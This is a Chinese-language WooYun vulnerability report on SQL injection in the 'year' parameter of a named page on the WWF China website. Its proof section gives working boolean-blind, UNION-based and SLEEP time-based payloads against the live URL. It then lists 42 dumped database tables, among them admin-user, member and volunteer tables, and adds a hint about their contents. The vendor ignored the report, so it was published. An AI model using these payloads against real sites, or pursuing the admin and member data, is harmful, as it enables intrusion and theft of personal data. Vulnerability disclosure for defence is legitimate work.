当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-070470

漏洞标题:世界某自然基金会多处SQL注入

相关厂商:世界自然基金会官网

漏洞作者: 招收技术员

提交时间:2014-07-31 15:55

修复时间:2014-09-14 15:56

公开时间:2014-09-14 15:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-07-31: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-09-14: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

某基金会多处SQL注入

详细说明:

多处SQL注入:http://www.wwfchina.org/camp-progress.php?year=2014

漏洞证明:

Place: GET
Parameter: year
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: year=2014 AND 9430=9430
Type: UNION query
Title: MySQL UNION query (NULL) - 9 columns
Payload: year=2014 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a7a646a3a,0x4c
5a64674a436c6e4b48,0x3a6d747a3a), NULL, NULL, NULL, NULL, NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: year=2014 AND SLEEP(5)
Database: wwfchina
[42 tables]
+---------------------------------------+
| campaign_iwtc |
| campaign_waa2012city |
| campaign_waa2012user |
| feedback |
| fox_adminuser |
| fox_campaign |
| fox_category |
| fox_config |
| fox_intro |
| fox_job |
| fox_media |
| fox_media_type |
| fox_news |
| fox_newsletter |
| fox_office |
| fox_pandapal |
| fox_print |
| fox_project |
| fox_publication |
| fox_special |
| fox_specialdetail |
| fox_sponsor |
| fox_staff |
| fox_story |
| fox_video |
| fox_wallpaper |
| fox_wiki |
| fox_wikiattachment |
| fox_wwfaction |
| home_info |
| oldpublication |
| pandapal_survey |
| qqimport |
| signup |
| volunteer |
| volunteer_option_work |
| volunteer_worklog |
| weibouser |
| wwf_member |
| wwfmember |
| wwfmembertemp |
| wwfpress |
+---------------------------------------+
Database: information_schema
[40 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INNODB_BUFFER_PAGE |
| INNODB_BUFFER_PAGE_LRU |
| INNODB_BUFFER_POOL_STATS |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_RESET |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_TRX |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
adminuser and member 你懂的!

修复方案:

过滤把!

版权声明:转载请注明来源 招收技术员@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝